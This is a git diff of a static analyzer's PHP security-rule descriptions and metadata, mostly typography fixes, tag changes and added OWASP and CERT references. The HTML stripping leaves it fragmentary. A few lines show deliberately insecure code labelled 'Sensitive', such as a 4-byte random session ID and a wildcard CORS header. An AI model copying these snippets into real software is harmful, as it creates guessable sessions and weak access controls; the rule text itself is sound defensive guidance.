An issue will be created for the functions
mb_ereg_search_pos
,mb_ereg_search_regs
andmb_ereg_search
if and @@ -75,6 +75,4 @@See
- OWASP Regular expression Denial of Service - ReDoS
Deprecated
-This rule is deprecated; use {rule:php:S2631} instead.
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4784.json b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4784.json
index 010403a29e..8e9f094db8 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4784.json
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4784.json
@@ -1,10 +1,8 @@
 {
 "title": "Using regular expressions is security-sensitive",
 "type": "SECURITY_HOTSPOT",
- "status": "deprecated",
- "tags": [
-
- ],
+ "status": "ready",
+ "tags": [],
 "defaultSeverity": "Critical",
 "ruleSpecification": "RSPEC-4784",
 "sqKey": "S4784",
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4787.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4787.html
index 0d68ec13c1..9c810ae515 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4787.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4787.html
@@ -18,7 +18,7 @@Ask Yourself Whether
a nonce is used, and the same value is reused multiple times, or the nonce is not random. the RSA algorithm is used, and it does not incorporate an Optimal Asymmetric Encryption Padding (OAEP), which might weaken the encryption. -the CBC (Cypher Block Chaining) algorithm is used for encryption, and it's IV (Initialization Vector) is not generated using a secure random + the CBC (Cypher Block Chaining) algorithm is used for encryption, and it’s IV (Initialization Vector) is not generated using a secure random algorithm, or it is reused. the Advanced Encryption Standard (AES) encryption algorithm is used with an unsecure mode. See the recommended practices for more information. @@ -40,15 +40,15 @@Recommended Secure Coding Practices
When using the RSA algorithm, incorporate an Optimal Asymmetric Encryption Padding (OAEP). When CBC is used for encryption, the IV must be random and unpredictable. Otherwise it exposes the encrypted value to crypto-analysis attacks like "Chosen-Plaintext Attacks". Thus a secure random algorithm should be used. An IV value should be associated to one and only one encryption - cycle, because the IV's purpose is to ensure that the same plaintext encrypted twice will yield two different ciphertexts. + cycle, because the IV’s purpose is to ensure that the same plaintext encrypted twice will yield two different ciphertexts.The Advanced Encryption Standard (AES) encryption algorithm can be used with various modes. Galois/Counter Mode (GCM) with no padding should be preferred to the following combinations which are not secured: +
- Electronic Codebook (ECB) mode: Under a given key, any given plaintext block always gets encrypted to the same ciphertext block. Thus, it - does not hide data patterns well. In some senses, it doesn't provide serious message confidentiality, and it is not recommended for use in + does not hide data patterns well. In some senses, it doesn’t provide serious message confidentiality, and it is not recommended for use in cryptographic protocols at all.
- Cipher Block Chaining (CBC) with PKCS#5 padding (or PKCS#7) is susceptible to padding oracle attacks.
-Sensitive Code Example
Builtin functions
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4787.json b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4787.json
index 5b617c7cdf..7cf33bb370 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4787.json
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4787.json
@@ -2,9 +2,7 @@
 "title": "Encrypting data is security-sensitive",
 "type": "SECURITY_HOTSPOT",
 "status": "deprecated",
- "tags": [
-
- ],
+ "tags": [],
 "defaultSeverity": "Critical",
 "ruleSpecification": "RSPEC-4787",
 "sqKey": "S4787",
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4790.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4790.html
index 3de99e85b9..f2f99e53ea 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4790.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4790.html
@@ -6,12 +6,12 @@Ask Yourself Whether
The hashed value is used in a security context like:
- User-password storage.
-- Security token generation (used to confirm e-mail when registering on a website, reset password, etc ...).
+- Security token generation (used to confirm e-mail when registering on a website, reset password, etc …).
- To compute some message integrity.
There is a risk if you answered yes to any of those questions.
Recommended Secure Coding Practices
-Safer alternatives, such as
SHA-256
,SHA-512
,SHA-3
are recommended, and for password hashing, it's even +Safer alternatives, such as
SHA-256
,SHA-512
,SHA-3
are recommended, and for password hashing, it’s even better to use algorithms that do not compute too "quickly", likebcrypt
,scrypt
,argon2
orpbkdf2
because it slows downbrute force attacks
.Sensitive Code Example
@@ -33,6 +33,10 @@See
OWASP Top 10 2017 Category A6 - Security Misconfiguration +Mobile AppSec + Verification Standard - Cryptography Requirements +OWASP Mobile Top 10 2016 Category M5 - + Insufficient Cryptography MITRE, CWE-327 - Use of a Broken or Risky Cryptographic Algorithm MITRE, CWE-916 - Use of Password Hash With Insufficient Computational Effort
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4790.json b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4790.json
index 48d5988850..9c5b4798c4 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4790.json
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4790.json
@@ -7,7 +7,8 @@
 "spring",
 "owasp-a6",
 "sans-top25-porous",
- "owasp-a3"
+ "owasp-a3",
+ "owasp-m5"
 ],
 "defaultSeverity": "Critical",
 "ruleSpecification": "RSPEC-4790",
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4792.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4792.html
index a8a4190f50..e1fca43418 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4792.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4792.html
@@ -28,7 +28,7 @@Ask Yourself Whether
There is a risk if you answered yes to any of those questions.
Recommended Secure Coding Practices
-
-- Check that your production deployment doesn't have its loggers in "debug" mode as it might write sensitive information in logs.
+- Check that your production deployment doesn’t have its loggers in "debug" mode as it might write sensitive information in logs.
- Production logs should be stored in a secure location which is only accessible to system administrators.
- Configure the loggers to display all warnings, info and error messages. Write relevant information such as the precise time of events and the hostname.
@@ -39,12 +39,12 @@Recommended Secure Coding Practices
- Add limits to the size of the logs and make sure that no user can fill the disk with logs. This can happen even when the user does not control the logged information. An attacker could just repeat a logged action many times.
Remember that configuring loggers properly doesn't make them bullet-proof. Here is a list of recommendations explaining on how to use your +
Remember that configuring loggers properly doesn’t make them bullet-proof. Here is a list of recommendations explaining on how to use your logs:
-
- Don't log any sensitive information. This obviously includes passwords and credit card numbers but also any personal information such as user - names, locations, etc... Usually any information which is protected by law is good candidate for removal.
-- Sanitize all user inputs before writing them in the logs. This includes checking its size, content, encoding, syntax, etc... As for any user +
- Don’t log any sensitive information. This obviously includes passwords and credit card numbers but also any personal information such as user + names, locations, etc… Usually any information which is protected by law is good candidate for removal.
+- Sanitize all user inputs before writing them in the logs. This includes checking its size, content, encoding, syntax, etc… As for any user input, validate using whitelists whenever possible. Enabling users to write what they want in your logs can have many impacts. It could for example use all your storage space or compromise your log indexing service.
- Log enough information to monitor suspicious activities and evaluate the impact an attacker might have on your systems. Register events such as
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4818.json b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4818.json
index 9f4e0843ad..ee901ec953 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4818.json
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4818.json
@@ -2,9 +2,7 @@
 "title": "Using Sockets is security-sensitive",
 "type": "SECURITY_HOTSPOT",
 "status": "deprecated",
- "tags": [
-
- ],
+ "tags": [],
 "defaultSeverity": "Critical",
 "ruleSpecification": "RSPEC-4818",
 "sqKey": "S4818",
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4823.json b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4823.json
index e6601a6198..f84acd7c6e 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4823.json
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4823.json
@@ -2,9 +2,7 @@
 "title": "Using command line arguments is security-sensitive",
 "type": "SECURITY_HOTSPOT",
 "status": "deprecated",
- "tags": [
-
- ],
+ "tags": [],
 "defaultSeverity": "Critical",
 "ruleSpecification": "RSPEC-4823",
 "sqKey": "S4823",
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4828.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4828.html
index a3d5801b16..103874ca9d 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4828.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4828.html
@@ -14,8 +14,8 @@
Ask Yourself Whether
There is a risk if you answered yes to any of those questions.
Recommended Secure Coding Practices
-
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4829.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4829.html
index 812d9f6838..9985aab70b 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4829.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4829.html
@@ -39,7 +39,7 @@- If the signal is sent because of a user's request. Check that the user is allowed to send this signal. You can for example forbid it if the - user doesn't own the process.
+- If the signal is sent because of a user’s request. Check that the user is allowed to send this signal. You can for example forbid it if the + user doesn’t own the process.
- Secure the source from which the process PID is read.
- Run the process sending the signals with minimal permissions.
Sensitive Code Example
$input = fopen('php://stdin', 'r'); // Sensitive fclose($input); // OKSee:
+See
Validation of X.509 certificates is essential to create secure SSL/TLS sessions not vulnerable to man-in-the-middle attacks.
+Validation of X.509 certificates is essential to create secure SSL/TLS sessions not vulnerable to man-in-the-middle attacks.
The certificate chain validation includes these steps:
It's not recommended to reinvent the wheel by implementing custom certificate chain validation.
+It’s not recommended to reinvent the wheel by implementing custom certificate chain validation.
TLS libraries provide built-in certificate validation functions that should be used.
@@ -23,6 +23,10 @@See
Starting from its version 8, Drupal is relying on namespaces to be compliant with PSR-4 standard. Drupal's modules should be compliant with
+href="https://github.com/php-fig/fig-standards/blob/master/accepted/PSR-4-autoloader.md">PSR-4 standard. Drupal’s modules should be compliant with
PSR-4 standard and therefore should no longer rely on include
or include_once
or require
or
require_once
functions.
This rule doesn't raise issues on autoload.php
or ScriptHandler.php
files.
This rule doesn’t raise issues on autoload.php
or ScriptHandler.php
files.
Granting correct permissions to users, applications, groups or roles and defining required permissions that allow access to a resource is sensitive, must therefore be done with care. For instance, it is obvious that only users with administrator privilege should be authorized to -add/remove the administrator permission of another user.
+add/remove the administrator permission of another user.There is a risk if you answered yes to any of those questions.
@@ -22,8 +22,8 @@CakePHP
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4834.json b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4834.json
index 8c7a0ff071..5d30d450ca 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4834.json
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S4834.json
@@ -2,9 +2,7 @@
 "title": "Controlling permissions is security-sensitive",
 "type": "SECURITY_HOTSPOT",
 "status": "deprecated",
- "tags": [
-
- ],
+ "tags": [],
 "defaultSeverity": "Minor",
 "ruleSpecification": "RSPEC-4834",
 "sqKey": "S4834",
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S5042.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S5042.html
index bb40071cdb..b183b76498 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S5042.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S5042.html
@@ -1,7 +1,7 @@Successful Zip Bomb attacks occur when an application expands untrusted archive files without controlling the size of the expanded data, which can lead to denial of service. A Zip bomb is usually a malicious archive file of a few kilobytes of compressed data but turned into gigabytes of uncompressed data. To achieve this extreme compression ratio, attackers will -compress irrelevant data (eg: a long string of repeated bytes).
+compress irrelevant data (eg: a long string of repeated bytes).Archives to expand are untrusted and:
For ZipArchive module:
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S5122.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S5122.html
index e1d015a85f..5a156a337f 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S5122.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S5122.html
@@ -10,7 +10,7 @@ / relax the same origin policy.Access-Control-Allow-Origin: untrustedwebsite.com
. Access-Control-Allow-Origin: untrustedwebsite.com
. Access-Control-Allow-Origin: *
origin
header. If a session ID can be guessed (not generated with a secure pseudo random generator, or with insufficient length ...) an attacker may be able to -hijack another user's session.
+If a session ID can be guessed (not generated with a secure pseudo random generator, or with insufficient length …) an attacker may be able to +hijack another user’s session.
There is a risk if you answered yes to any of those questions.
Don't manually generate session IDs, use instead language based native functionality.
+Don’t manually generate session IDs, use instead language based native functionality.
session_id(bin2hex(random_bytes(4))); // Sensitive: 4 bytes is too short @@ -26,6 +26,7 @@See
Misconfiguration
@@ -57,6 +60,9 @@Compliant Solution
$mailer = new PHPMailer(true); $mailer->SMTPSecure = 'tls'; // Compliant + +define( 'FORCE_SSL_ADMIN', true); // Compliant +define( 'FORCE_SSL_LOGIN', true); // Compliant
No issue is reported for the following cases because they are not considered sensitive:
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S5332.json b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S5332.json
index 52063608be..ec4db6e889 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S5332.json
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S5332.json
@@ -18,12 +18,6 @@
 ],
 "OWASP": [
 "A3"
- ],
- "OWASP Mobile": [
- "M3"
- ],
- "MASVS": [
- "MSTG-NETWORK-1"
 ]
 }
 }
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S5527.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S5527.html
index 216cc1a320..d09efa2ac2 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S5527.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S5527.html
@@ -1,7 +1,7 @@ -To establish a SSL/TLS connection not vulnerable to man-in-the-middle attacks, it's essential to make sure the server presents the right -certificate.
-The certificate's hostname-specific data should match the server hostname.
-It's not recommended to re-invent the wheel by implementing custom hostname verification.
+To establish a SSL/TLS connection not vulnerable to man-in-the-middle attacks, it’s essential to make sure the server presents the right +certificate.
+The certificate’s hostname-specific data should match the server hostname.
+It’s not recommended to re-invent the wheel by implementing custom hostname verification.
TLS/SSL libraries provide built-in hostname verification functions that should be used.
@@ -19,6 +19,10 @@See
Encryption operation mode and the padding scheme should be chosen appropriately to guarantee data confidentiality, integrity and authenticity:
the GCM (Galois Counter Mode) mode which works -internally with zero/no padding scheme, is recommended, as it is designed to provide both data authenticity (integrity) and confidentiality. Other -similar modes are CCM, CWC, EAX, IAPM and OCB.
-the CBC (Cipher Block Chaining) mode by itself provides only data confidentiality, it's recommended to use it along with Message -Authentication Code or similar to achieve data authenticity (integrity) too and thus to prevent padding oracle attacks.
-the ECB (Electronic Codebook) mode doesn't provide serious message confidentiality: under a given key any given plaintext block -always gets encrypted to the same ciphertext block. This mode should not be used.
-Strong cipher algorithms are cryptographic systems resistant to cryptanalysis, they are not vulnerable to well-known attacks like brute force attacks for example.
A general recommendation is to only use cipher algorithms intensively tested and promoted by the cryptographic community.
-More specifically for block cipher, it's not recommended to use algorithm with a block size inferior than 128 bits.
+More specifically for block cipher, it’s not recommended to use algorithm with a block size inferior than 128 bits.
<?php
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S5547.json b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S5547.json
index 41eb84cc51..08c96bd53b 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S5547.json
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S5547.json
@@ -2,12 +2,17 @@
 "title": "Cipher algorithms should be robust",
 "type": "VULNERABILITY",
 "status": "ready",
+ "remediation": {
+ "func": "Constant\/Issue",
+ "constantCost": "15min"
+ },
 "tags": [
 "cwe",
 "privacy",
 "owasp-a6",
 "sans-top25-porous",
- "owasp-a3"
+ "owasp-a3",
+ "owasp-m5"
 ],
 "defaultSeverity": "Critical",
 "ruleSpecification": "RSPEC-5547",
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S5632.json b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S5632.json
index 321041374e..919612e113 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S5632.json
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S5632.json
@@ -6,9 +6,7 @@
 "func": "Constant\/Issue",
 "constantCost": "5min"
 },
- "tags": [
-
- ],
+ "tags": [],
 "defaultSeverity": "Blocker",
 "ruleSpecification": "RSPEC-5632",
 "sqKey": "S5632",
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S5693.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S5693.html
index 38ad90660f..f267f89e78 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S5693.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S5693.html
@@ -13,7 +13,7 @@Recommended Secure Coding Practices
It is recommended to customize the rule with the limit values that correspond to the web application.
Testing equality or nullness with PHPUnit's assertTrue()
or assertFalse()
should be simplified to the corresponding
+
Testing equality or nullness with PHPUnit’s assertTrue()
or assertFalse()
should be simplified to the corresponding
dedicated assertion.
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S5785.json b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S5785.json
index be406ffb6c..ebaa53c4d9 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S5785.json
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S5785.json
@@ -2,6 +2,10 @@
 "title": "PHPUnit assertTrue\/assertFalse should be simplified to the corresponding dedicated assertion",
 "type": "CODE_SMELL",
 "status": "ready",
+ "remediation": {
+ "func": "Constant\/Issue",
+ "constantCost": "2min"
+ },
 "tags": [
 "tests",
 "phpunit"
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S5808.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S5808.html
index 96f51ca3c2..5ccd9444e2 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S5808.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S5808.html
@@ -1,5 +1,5 @@Authorizations granted or not to users to access resources of an application should be based on strong decisions. For instance, checking whether -the user is authenticated or not, has the right roles/privileges. It may also depend on the user's location, or the date, time when the user requests +the user is authenticated or not, has the right roles/privileges. It may also depend on the user’s location, or the date, time when the user requests access.
Noncompliant Code Example
In a Symfony web application:
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S5863.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S5863.html
index 802e42228e..3bec1a2be4 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S5863.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S5863.html
@@ -1,4 +1,4 @@ -Assertions comparing an object to itself are more likely to be bugs due to developer's carelessness.
+Assertions comparing an object to itself are more likely to be bugs due to developer’s carelessness.
This rule raises an issue when the actual expression matches the expected expression.
Noncompliant Code Example
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S5876.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S5876.html
index 94a7033973..7b7582219b 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S5876.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S5876.html
@@ -1,4 +1,4 @@ -Session fixation attacks occur when an attacker can force a legitimate user to use a session ID that he knows. To avoid fixation attacks, it's a
Session fixation attacks occur when an attacker can force a legitimate user to use a session ID that he knows. To avoid fixation attacks, it’s a good practice to generate a new session each time a user authenticates and delete/invalidate the existing session (the one possibly known by the attacker).
Noncompliant Code Example
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S5899.html b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S5899.html
index 1151980ad1..56ba5cb564 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S5899.html
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S5899.html
@@ -1,8 +1,8 @@The PHPUnit test runner does execute public methods defined within test classes that have a name starting with "test" or the -@test annotation. Methods that do not convey to this will not get executed.
+@test annotation. Methods that do not convey to this will not get executed.This rule raises an issue on methods marked as test methods (by name or annotation) but do not have a public visibility. An issue is also raised on public methods that are not marked as tests, do contain assertions, and are not called from within another discoverable test method within the class. -No issues are raised in abstract classes.
+No issues are raised in abstract classes.Noncompliant Code Example
class MyTest extends \PHPUnit\Framework\TestCase {
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S881.json b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S881.json
index 631b8ac253..9cecc4de2e 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S881.json
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S881.json
@@ -6,9 +6,7 @@
 "func": "Constant\/Issue",
 "constantCost": "5min"
 },
- "tags": [
-
- ],
+ "tags": [],
 "defaultSeverity": "Major",
 "ruleSpecification": "RSPEC-881",
 "sqKey": "S881",
diff --git a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S930.json b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S930.json
index e9d441d31b..3865061ef1 100644
--- a/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S930.json
+++ b/php-checks/src/main/resources/org/sonar/l10n/php/rules/php/S930.json
@@ -7,8 +7,7 @@
 "constantCost": "10min"
 },
 "tags": [
- "cwe",
- "based-on-misra"
+ "cwe"
 ],
 "defaultSeverity": "Major",
 "ruleSpecification": "RSPEC-930",
@@ -17,6 +16,10 @@
 "securityStandards": {
 "CWE": [
 628
+ ],
+ "CERT": [
+ "EXP37-C.",
+ "DCL07-C."
 ]
 }
 }
diff --git a/sonarpedia.json b/sonarpedia.json
index f596c4d8d9..26b4802ab4 100644
--- a/sonarpedia.json
+++ b/sonarpedia.json
@@ -3,7 +3,7 @@
 "languages": [
 "PHP"
 ],
- "latest-update": "2021-04-23T08:30:00.832237Z",
+ "latest-update": "2021-08-16T12:31:35.301669Z",
 "options": {
 "no-language-in-filenames": true,
 "preserve-filenames": true